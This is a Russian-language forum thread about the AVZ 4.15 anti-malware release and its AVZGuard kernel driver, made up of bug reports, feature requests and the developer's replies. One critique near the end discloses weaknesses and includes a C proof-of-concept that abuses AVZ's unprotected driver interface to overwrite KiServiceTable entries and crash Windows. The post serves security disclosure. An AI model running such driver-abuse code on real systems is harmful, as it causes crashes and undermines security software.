AVZ 4.15 + AVZGuard - тестирование, обсуждение, предложения по доработке

Вышла новая версия AVZ - 4.15.
Доработки и усовершенствования:
[+++] Новая система AVZGuard, предназначенная для:
1. Защиты AVZ и указанных пользователем доверенных приложений от вредоносных программ
2. Ограничение действий вредоносных программ (блокируется создание файлов, модификация реестра и т.п.)
[+] Возможность запуска внешней программы из скрипта
[+] Получение версии AVZ в скрипте (в разном виде)
[+] Поддержка текстовых файлов и строковых массивов неограниченной длинны в скриптах
[+] Запуск скрипта из меню
----------
Технология AVZGuard основана на KernelMode драйвере, который разграничивает доступ запущенных приложений к системе. Драйвер может функционировать в системах, основанных на платформе NT (начиная с NT 4.0 и заканчивая Vista Beta 1). Основное назначение - борьба с трудноудалимыми вредоносными программами, которые активно противодействуют процессу лечение компьютера (Look2me, руткиты, и т.п.).
В момент активации системы все приложения делятся на две категории - доверенные и недоверенные. На доверенные приложения драйвер не оказывает никакого влияния, в то время как недоверенным запрещаются следующие операции:
[LIST][*]Создание, модификация и удаление параметров реестра[*]Создание файлов с расширениями *.exe, *.dll, *.sys, *.ocx, *.scr, *.cpl, *.pif, *.bat, *.cmd на любом диске[*]Обращение к устройствам \device\rawip, \device\udp, \device\tcp, \device\ip[*]Доступ к device\physicalmemory (что блокирует операции с физической памятью из UserMode)[*]Установка драйверов (является следствием блокировки работы с реестром)[*]Запуск процессов[*]Открытие запущенных процессов с уровнем доступа, допускающим его остановку или запись в его адресное пространство[*]Открытие потоков других процессов (при этом недоверенному процессу не запрещается открывать и останавливать свои потоки)[/LIST][FONT=Arial CYR][SIZE=2]Исходно доверенным является только [/SIZE][/FONT][FONT=Arial][SIZE=2]AVZ, [/SIZE][/FONT][FONT=Arial CYR][SIZE=2]но из меню "[/SIZE][/FONT][FONT=Arial][SIZE=2]AVZGuard[/SIZE][/FONT][FONT=Arial CYR][SIZE=2]\Запустить приложение как доверенное" можно запустить любое приложение. По умолчанию для доверенных приложений действует принцип наследования доверительных отношений - все запускаемые доверенным приложением процессы так-же считаются доверенными.

[U][B]Назначение AVZGuard:[/B][/U]
[LIST][*]Борьба с трудноудалимыми троянским программами, которые восстанавливают ключи реестра и удаленные файлы, запускают остановленные процессы или иными способами препятствуют своему удалению. Это основное назначение системы;[*]Защита доверенных приложений от недоверенных. Позволяет защититьAVZ и запущенные им доверенные приложения от воздействия работающих вредоносных программ;[*]Распространение действия антируткита UserMode AVZ на другие процессы. Пример - утилиты типа VBA Console scanner, DrWeb Cure IT, HijackThis и т.п., не обладают функциями детектирования и нейтрализации руткитов. В этом случае можно запустить AVZ, провести нейтрализацию руткитов для его процесса, а затем включить AVZGuard и запустить тот-же DrWeb Cure IT как доверенное приложение. В этом случае драйвер AVZGuard возьмет на себя функцию защиты запущенного процесса, и в том числе не позволит руткиту модифицировать его. Естественно, данная технология не является панацеей от всех видов UserMode руткитов, но основные их типы (в частности Hacker Defender) могут быть нейтрализованы подобным образом.[/LIST]

Ссылка как обычно - [URL="http://z-oleg.com/avz4.zip"]http://z-oleg.com/avz4.zip[/URL]
База: 20554 сигнатуры, 2 нейропрофиля, 55 микропрограмм лечения, 357 микропрограмм эвристики, 47841 подписей безопасных файлов.

[B][U]Пример алгоритма лечения Look2me с применением AVZGuard:[/U][/B]
1. Закрыть все приложения, запустить AVZ, включить AVZGuard
2. Пролечить компьютер, при необходимость применить отложенное удаление файлов Look2me
3. При необходимости удалить элементы автозапуска Look2me в диспетчере автозапуска и диспетчере расширений Explorer
4. Выйти из AVZ [U]не отключая AVZGuard[/U] и перезагрузить компьютер
5. После перезагрузки при необходимости "добить" оставшиеся файлы

А почему не разблокируется " Блокировать работу Rootkit Kernel Mode"?

Имеем баг.
1. Диспетчер служб и драйверов. Тип:все. Имеем всё зелёное.
2. Переходим на вкладку "Сервисы по анализу реестра".
3. Возвращаемя на вкладку "Сервисы по данным АПИ" и имеем кучу черных драйверов которые раньше были не видны.
А всё из за того что меняется селектор с "Активные" на "Все".
Думаю по умолчанию нужно ставить "Все". А то я не сразу заметил что нужно переключить что бы всё увидеть.
Еще одна проблема.
[B]Неактивные службы и драйверы не присутствуют в логе исследования системы!!![/B]

[quote=Iceman]А почему не разблокируется " Блокировать работу Rootkit Kernel Mode"?[/quote]
Он блокируется на время работы AVZGuard - т.е. если AVZGuard активен, то блокировка в Kernel Mode автоматом становится неактивной

Что-то на странице закачки не могу найти версию 4.15 :(

[quote=Nick222]Что-то на странице закачки не могу найти версию 4.15 :([/quote]
Наверное, страничка берется из кеша прокси или кеша браузера ...

Олег, пост #3 заметил?

А плагин для Бата останется старый?
Можно не качать?

текст в заголовке окон о включении/выключении AVZGuard не умещается в окне и нечитаем, поэтому возникает вопрос - а нужен ли он там?

А System у тебя в доверенных?

[QUOTE=rav]А System у тебя в доверенных?[/QUOTE]
Нет, System исходно я включал в доверенные, потом провел опыты и исключил. Т.е. в момент активации в списке доверенных только AVZ и ничего более.
[B]to MOCT[/B]
Да, текстовка в заголовке этих окошек явно левая - я и не заметил...

[quote=Geser]Олег, пост #3 заметил?[/quote]
Да, конечно. Просто предметно сказать по этому поводу ничего не могу - я ищу место и причину бага. А вот исследование системы - другое дело - я специально исключал неактивные сервесы и незагруженные драйверы из лога. Если нужно - включу ...

Олег, я так понимаю, что AVZGuard не очень годится как постоянно работающий сторож ?

userr

[QUOTE=lazy userr]Олег, я так понимаю, что AVZGuard не очень годится как постоянно работающий сторож ?

userr[/QUOTE]
AVZGuard - это "сторож на время лечения", чтобы всячески мешать зловредам "ожить". Нормально работать с ним весьма трудно ввиду его черно-белой логики и практически нулевой управляемости.
Но эта технология в скором времени ляжет в основу монитора AVZ, но там и логика изменится - вместо лобового запрета всем и всего там будут действовать правила, зависящие от приложений и их поведения.
Но следующая на очереди технология - это "монитор активности". Его идея - слежение за системой в реальном времени и протоколирование событий в единый лог (файлы, реестр, операции с процессами и потоками).

[QUOTE]я специально исключал неактивные сервесы и незагруженные драйверы из лога. Если нужно - включу ...[/QUOTE]
Мне кажется это даёт потенциальную возможность обмануть анализатор. Например сервис который запускается, отрабатывает и завершается. В момент сканирования не активен, но во время старта свою работу выполняет. Не знаю, может еще какие-то похожие способы есть для драйверов. Я думаю стоит в лог включать, только делать пометку что не активен.
И еще, нужно помечать файлы не найденные на диске.
Так же не помешала бы автоматическая чистка мусора - файлов не найденных на диске. А то приходит человек, у него вагон файлов в автозапуске, которые удалены давно. Задалбывает объяснять как это всё удалить.

[quote=Geser]Мне кажется это даёт потенциальную возможность обмануть анализатор. Например сервис который запускается, отрабатывает и завершается. В момент сканирования не активен, но во время старта свою работу выполняет. Не знаю, может еще какие-то похожие способы есть для драйверов. Я думаю стоит в лог включать, только делать пометку что не активен.
И еще, нужно помечать файлы не найденные на диске.
Так же не помешала бы автоматическая чистка мусора - файлов не найденных на диске. А то приходит человек, у него вагон файлов в автозапуске, которые удалены давно. Задалбывает объяснять как это всё удалить.[/quote]
Для драйвера тоже такое возможно - драйвер при инициализации может что-то сделать и затем вернуть статус неуспешной инициализации - тогда система его выгрузит.
Вывод - я введу в лог исследования столбец "активность" и буду выводить все службы и драйверы. Далее, про ненайденные на диске файлы я тоже сделаю. Чистку системы я давно хотел организавать - это нетрудно, но всегда есть шанс зашибить что-то лишнее оптом. Я продумаю этот вопрос, сделать опциональную функцию "зачистки хвостов" труда не составляет.

Спасибо!
Скачал, поставил, проверил...

Но что значит:
"3. Сканирование дисков
data.file MailBomb detected !"

[QUOTE=Nick222]Спасибо!
Скачал, поставил, проверил...

Но что значит:
"3. Сканирование дисков
data.file MailBomb detected !"[/QUOTE]
Про "MailBomb detected" я все забываю в доку написать пару абзацев ... Когда идет проверка архивов, то возможно обнаружение файлов, у которых большой распакованный размер и при этом высокая степень сжатия (порог в AVZ - файл более 10 мб, сжатый сильнее чем в 100 раз). Такие архивы применяются в качестве почтовой бомбы против on-line антивирусов (прислывается на проверку архив в 50 кб, а распаковка файла дает несколько Gb). Но файл не обязательно опасен - например, некоторые DBF файлы имеют размер 50-100 мб, и сжимаются при этом до 50-100 кб - это и дает срабатывание.
В п.п. 8.2 документации описан ключ DetectMailBomb, позволяющий отключить эту проверку.

При первом запуске нашла неопознаный процесс... (во вложении)
после перезапуска пока не появлялся...
ps предыдущая версия такого процесса не видит.


И предложение, а почему бы не добавить возможность реактирования строк в менеджере hosts файла?

[QUOTE=Shu_b]При первом запуске нашла неопознаный процесс... (во вложении)
после перезапуска пока не появлялся...
ps предыдущая версия такого процесса не видит.


И предложение, а почему бы не добавить возможность реактирования строк в менеджере hosts файла?[/QUOTE]
Есть подозрение, что тот псводоскрытый процесс в логе является результатом того, что в момент изучения запущенных процессов процесс с PID 2716 завершил свою работу. Поэтому факт его присутствия зафиксировался, но анализ естетственно не прошел...
Редактирование файла Hosts я приделаю, где-то в списке доработок это значится.

обращаю внимание, что глюк с процессом System остался. хотя его легко отфильтровать либо по имени, либо по PIDу из первой десятки...

[QUOTE=MOCT]обращаю внимание, что глюк с процессом System остался. хотя его легко отфильтровать либо по имени, либо по PIDу из первой десятки...[/QUOTE]
А если зловред создаст процесс с именем System ?

[QUOTE=Geser]А если зловред создаст процесс с именем System ?[/QUOTE]
чтобы удовлетворяло изложенным мной критериям? это будет проблематично ;-) если кто-то готов поспорить, то пусть предъявит concept code ;)

[QUOTE=MOCT]чтобы удовлетворяло изложенным мной критериям? это будет проблематично ;-) если кто-то готов поспорить, то пусть предъявит concept code ;)[/QUOTE]
Я думаю есть другие критерии проверки, что это действительно тот system а сравнивать имена не лучший вариант.

[QUOTE=Geser]Я думаю есть другие критерии проверки, что это действительно тот system а сравнивать имена не лучший вариант.[/QUOTE]
ну, вот-первых, у меня связка из двух условий.
а во-вторых, мое предложение еще никто не опроверг.
так что необоснованные возражения не принимаются ;-))

[QUOTE=MOCT]ну, вот-первых, у меня связка из двух условий.
а во-вторых, мое предложение еще никто не опроверг.
так что необоснованные возражения не принимаются ;-))[/QUOTE]
Увы, но опровергнуть придется :) ... в моей книге будет пример, именуемый rkkm3a, его упрощенный откомпилированный вариант лежит на нашем FTP, имя файла - test_sys.zip. Нужно распаковать пример, а затем запустить run_me.bat и посмотреть список процессов (в AVZ или по трем кнопкам - будет интересно ...). Собственно процесс System станет виден как Hacked с PID=10000, а первый попавшийся процесс получит PID 4 (я не менял его имени, чтобы можно было увидеть, что это за процесс ...).

[QUOTE=Зайцев Олег]Собственно процесс System станет виден как Hacked с PID=10000, а первый попавшийся процесс получит PID 4 (я не менял его имени, чтобы можно было увидеть, что это за процесс ...).[/QUOTE]
тогда все плохо :(

[QUOTE=MOCT]тогда все плохо :([/QUOTE]
Пессимизм - двигатель прогресса:P

[QUOTE=MOCT]тогда все плохо :([/QUOTE]
Не совсем плохо - если после того ядреного примера запустить AVZ, то он начнет вопить про скрытый процесс - из-за нестыковок. Так что с System проблему я решу, но придется проверки в KernelMode проводить

AVZGuard - это сильно. Спасибо, Олег, AVZ превратилась в мощнейший инструмент для борьбы с вредоносным ПО.

1. Справка "Диспетчер процессов"
Не указано о закладке "Окна процесса".

2. Справка "Диспетчер служб и драйверов"
Особенностью диспетчера служб и драйверов AVZ является возможность использования в его работы системы противодействия
^^^^^^^^^^^^^^^^^^

3. Несколько системных длл не найдены в базе безопасных - это у меня не установленны некоторые апдейты или в базе нет? (ОС -Вин98 IE6SP1: WININET.DLL-6.00.2800.1525 URLMON.DLL- 6.00.2800.1525 MSHTML.DLL - 6.00.2800.1528)

3.1. Удаляются ли из базы безопасных старые версии системных файлов замененных в апдейтах?

4. При использовании в скрипте AddToLog перед RunScan добавления к логу затираются - добавить в справку или исправить (вынести в команды скрипта функцию очистки лога и убрать ее из RunScan)

1. Это упущение, допишу ...
2. Очепятка :)
3. Это нормально ... стоит прислать их для включения в базу (см. ссылку "прислать чистые файлы" на главной странице virusinfo). Дело в том, что в базу чистых попадают наиболее распространенные версии файлов, но естественно не все
3.1 Нет, все версии хрянятся пожизненно в виде файлов у меня в хранилище и подписей в базах. Дело в том, что апдейты устанавливают далеко не все ... поэтому хранятся все варианты. По хранилищу с чистыми файлами периодически гоняются антивирусы, в частности VBA - для поиска ложных срабатываний эвристики
4. Да, этот баг уже исправлен, я скоро выпущу новую версию, в которой это испавлено

опять появился... интересно это моя или avz проблема...

[quote=Shu_b]опять появился... интересно это моя или avz проблема...[/quote]
Это если перезапустить AVZ - он по прежнему будет видеть такой процесс ? Если да, то это уже любопытно. Если нет - скорее всего какой-то из процесс периодически создается и завершается.

[QUOTE=Зайцев Олег]Это если перезапустить AVZ - он по прежнему будет видеть такой процесс ? Если да, то это уже любопытно.[/QUOTE]
Да, остаётся. Есть какие нибудь предложения?

Может быть, имеет смысл сделать отдельный пункт меню для стандартных (идущих с программой) скриптов, в котором можно будет сразу выбрать и выполнить их? Зачем - имхо это очень удобно. Вот ситуация, где это очень пригодилось бы
Здесь на форуме часто советуют включить противодействие руткитам. Кроме того в справке про AVZGuard описана такая схема его использования:
[quote]1. Закрыть все приложения
[u]2.Запустить AVZ, включить противодействие руткитам UserMode и KernelMode и пролечить систему[/u]
3.Включить AVZGuard (это приведет к автоматическому отключению антируткита KernelMode)
[/quote]
Смотрим на пункт [u]2[/u]. По-моему запускать проверку системы с эвристической проверкой, проверкой запущенных процессов, поиском кейлоггеров, поиском подозрительных портов, проверкой жестких дисков и поиском ошибок в LSP [u]в данном случае вовсе не обязательно[/u], потому что это лишнее, ведь нужно только блокировать работу руткитов, а не проверять все и вся. Так вот, в этом случае и в случае, когда на форуме советуют включить противодействие руткитам было бы очень удобно не запускать для этого проверку всего и вся, а использовать стандартный скрипт, который выполнит только детектирование и блокировку работы руткитов и напишет об этом в протокол.
Т.е. я предлагаю сделать стандартный скрипт, назовем его, скажем, "Поиск и блокировка RootKit", выполняющий только детектирование и блокировку работы руткитов + пишет об этом в протокол. Думаю, стоит сделать дополнительный пункт меню (скажем, в меню Файл) назовем его, скажем "Выполнить стандартный скрипт", и в нем подпункты с названиями стандартных скриптов. По-моему так будет гораздо удобнее. И чтобы не просить пользователя запустить проверку всего и вся для противодействия руткитам, достаточно будет сказать к примеру: Выполните "Файл" -> "Выполнить стандартный скрипт" -> "Поиск и блокировка RootKit". Всё. Ничего лишнего не проверяется и не делается.

P.S. Можно, конечно, это сделать просто как дополнительную функцию, без всяких скриптов - и вызывать ее можно например через меню "Файл" -> "Поиск и блокировка RootKit". Главное - сама возможность.

2Зайцев Олег:

1. AVZ жалуется на проводник.
c:\winnt\explorer.exe >>> подозрение на Trojan-Spy.Win32.Qeds.a ( 0C50E364 05FD200F 0020B2F7 00274247 243472)

Explorer.exe версии 5.00.3700.6690 пропатчен на предмет отображения в трее иконок в 256-цветной палитре.
000088EE: 01 11
00014E25: 01 11
00014E36: 01 11

Подробности: [url]http://www.dr-hoiby.com/TrayIconIn256Color/PatchInfos_5_0_3700_6690.html[/url]

AVZ версия 4.15 от 22.02.2006
ОС Windows 2004 SP4 Rus

2. Нельзя ли добавить поддержку обновления баз из любого каталога?
В диалоге "Оперативное автоматическое обновление" в списке "Источник" явно не хватает третьего пункта "Указать источник...". :-)

3. А нельзя ли так же выкладывать новые базы упакованные в архиве (например в zip-е)?

[QUOTE=Sam]2Зайцев Олег:
1. AVZ жалуется на проводник.
----------- отрезано -------------
AVZ версия 4.15 от 22.02.2006
ОС Windows 2004 SP4 Rus
----------- отрезано -------------
[/QUOTE]
Sorry, опечатка! :-) Windows конечно же 2000-чная.

[B]to kps[/B]
Сделаем так - по аналогии мо "микропрограммами восстановления" я введу "микропрограммы для выполнения стандартных операций", и код этих программ будет в AV базе ... что позволит добавлять и обновлять их по мере необходимости или обнаружения багов. В эту базу я внесу два скрипта для Virusinfo + скрипты для типовых действий типа нейтрализации руткитов, поиска кейлоггеров, проверки систмы и т.п

[B]to Sam[/B]
1. Пропатченный файл нужно прислать на [EMAIL="[email protected]"][email protected][/EMAIL] - я подправлю базы и внесу пропатченный файл в базу безопасных
2. Источник указать можно - обновляя базы скриптом. В соотв. команде скрипта есть возможность задать все параметры ... правда из каталога он обновляться не умеет, только FTP/HTTP. Но со временем я доделаю возможность обновления из указанной папки в меню ...
3. А есть смысл ? Сила сжатия AVZ файлов превосходит RAR и 7-ZIP по эффективности (можно для пробы сжать любой из *.avz файлов - результат будет нулевым. Единственный плюс может быть только в случае создания архива все папки Base, чтобы скачать все файлы одним махом.

[QUOTE=Зайцев Олег]Вышла новая версия AVZ - 4.15.
Доработки и усовершенствования:
[+++] Новая система AVZGuard, предназначенная для:
...
[/QUOTE]

Наконец-то удалось посмотреть на главную новость версии 4.15 - AVZGuard, в связи с чем позволю себе немного покритиковать как саму эту "новую" концепцию, так и ее текущую реализацию. Начнем с реализации, а затем, если позволит время, плавно перейдем к концепции.

Итак, [U]реализация[/U].
Поглядел с полчаса, что называется "слабо вооруженным глазом", и вот что удалось обнаружить за это время (выборочно):
[B]1)[/B] Читаем:
[QUOTE]Доработки и усовершенствования:
[+++] Новая система AVZGuard, предназначенная для:
1. Защиты AVZ и указанных пользователем доверенных приложений от вредоносных программ
[/QUOTE]
Это или вообще не реализовано, или реализовано не полностью, т.к. при включенном AVZGuard процесс AVZ легко убивается сторонним приложением, если оно было запущено до запуска AVZ (а ведь именно такой вариант развития событий - когда на компьютере пользователя уже распространилась разная живность, а потом запускается AVZ для борьбы с ней - является "штатным" для AVZ!).
[B]2)[/B] Далее:
[QUOTE]В момент активации системы все приложения делятся на две категории - доверенные и недоверенные. На доверенные приложения драйвер не оказывает никакого влияния, в то время как недоверенным запрещаются следующие операции:
...[*]Доступ к device\physicalmemory (что блокирует операции с физической памятью из UserMode)
...
[/QUOTE]
Плохая реализация, легко обходится через симлинки. Иными словами, в текущий момент любое user-mode приложение может спокойно заблокировать AVZGuard, сняв все его перехваты в KiServiceTable, а потом, в дополнение, прибив сам AVZ.
[B]3)[/B] Полностью отсутствует контроль за состоянием перехватов в KiServiceTable (т.е. AVZ не видит никаких закулисных манипуляций с этой таблицой). Да и в такой реализации совершенно не ясно, каким образом это можно осуществить, если "зверь" будет иметь собственный (запущенный, к примеру, во время загрузки системы) kernel-mode драйвер.
[B]4)[/B] Далее читаем:
[QUOTE=Зайцев Олег][B][U]Пример алгоритма лечения Look2me с применением AVZGuard:[/U][/B]
1. Закрыть все приложения, запустить AVZ, включить AVZGuard
2. Пролечить компьютер, при необходимость применить отложенное удаление файлов Look2me
...
[/QUOTE]
Если в точности последовать этому алгоритму, то вся работа AVZ заканчивается уже после 1-го пункта, т.к. включение AVZGuard сразу же после старта AVZ и следующим нажатием на кнопку "Пуск" почему-то приводит к такому сообщению об ошибке в Event Log-е:
[CODE]
Сбой при запуске службы "AVZ Kernel Driver" из-за ошибки
Не удается найти текст сообщения с номером 0xAVZ Kernel Driver в файле сообщений
...
<таких сообщений примерно штук 50>
...
Не удается найти текст сообщения с номером 0xAVZ Kernel Driver в файле сообщений %2
[/CODE]
Ситуацию временно нормализует другая последовательность действий:
1. Запускаем AVZ;
2. Нажимаем "Пуск", чтобы смог стартовать драйвер AVZ.sys, и только после этого включаем AVZGuard (и его драйвер AVZsg.sys, который, видимо, "опирается" на функциональность AVZ.sys для установки/снятия перехватов).
3. И далее уже по тексту...
[B]5)[/B] Как и раньше (твержу об этом с самого момента появления драйвера AVZ!), все общение между AVZ и его драйверами происходит в открытом и (!!!) доступном снаружи виде. Т.е., к примеру, можно даже не писать никаких kernel-mode драйверов и не делать никаких манипуляций с PhysicalMemory - AVZ уже содержит в себе весь необходимый для этого код в совершенно открытом для использования чужими программами виде! Достаточно дождаться загрузки AVZ с его драйвером, и вам тут же становятся доступными любые средства манипуляции с KiServiceTable. Вот пример такого кода, который за полсекунды с помощью драйвера AVZ (функции "обнуления" KiServiceTable) валит систему в синьку (некоторые детали, само собой, опущены):
[CODE]
typedef struct _vars
{
DWORD dwServiceId;
DWORD dwServiceAddress;
} VARS;

int main(int argc, char* argv[]) {
HANDLE hDevice;
VARS vInputBuffer;
VARS vOutputBuffer;
DWORD dwBytesReturned;

printf("Waiting for AVZ driver to load... ");
while (TRUE) {
hDevice = CreateFile("\\\\.\\AVZKernelDeviceLink",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDevice != INVALID_HANDLE_VALUE)
break;
Sleep(100);
}
printf("OK\n");

vInputBuffer.dwServiceId = 0;
vInputBuffer.dwServiceAddress = 0x00000000;
while (TRUE) {
if (!DeviceIoControl(hDevice,
(DWORD)IOCTL_AVZ_SETSYSTEMSERVICEADDRESSBYNO,
(void *) &vInputBuffer, sizeof(vInputBuffer),
(void *) &vOutputBuffer, sizeof(vOutputBuffer),
&dwBytesReturned, NULL)) {
printf("DeviceIoControl() failed, error %d\n", GetLastError());
CloseHandle (hDevice);
return 1;
}
vInputBuffer.dwServiceId++;
}

CloseHandle(hDevice);
return 0;
}
[/CODE]

Ну, и так далее... Не буду дальше утомлять вас разными тонкостями и подробностями.

[U]Концепция[/U].
AVZ неумолимо движется в сторону создания монитора + сэндбокса (первые шаги очень уж сильно напоминают обсуждаемый в соседних ветках DefenseWall)? Тогда может вообще не стоит ограничиваться полу-работающими полумерами, а сразу перейти к созданию нормального монитора? Ведь существующая концепция AVZGuard, по большому счету, не выдерживает критики, и особенно в тех условиях работы, для которых она предназначена - а именно в системе, где уже процветает живность. Любой "зверь", использующий драйвер ядра, способен нейтрализовать AVZGuard, т.к. его "защита" прозрачна и построена на перехвате ядерных функций, который очень сложно (если вообще возможно) контролировать в "штатных" условиях запуска AVZ (т.е. после загрузки системы)!

Иными словами: "Хватит уже полумер - даешь монитор!!!" :)

Уф-ф-ф-ф... устал уже давить батоны - пойду Олимпиаду смотреть! :)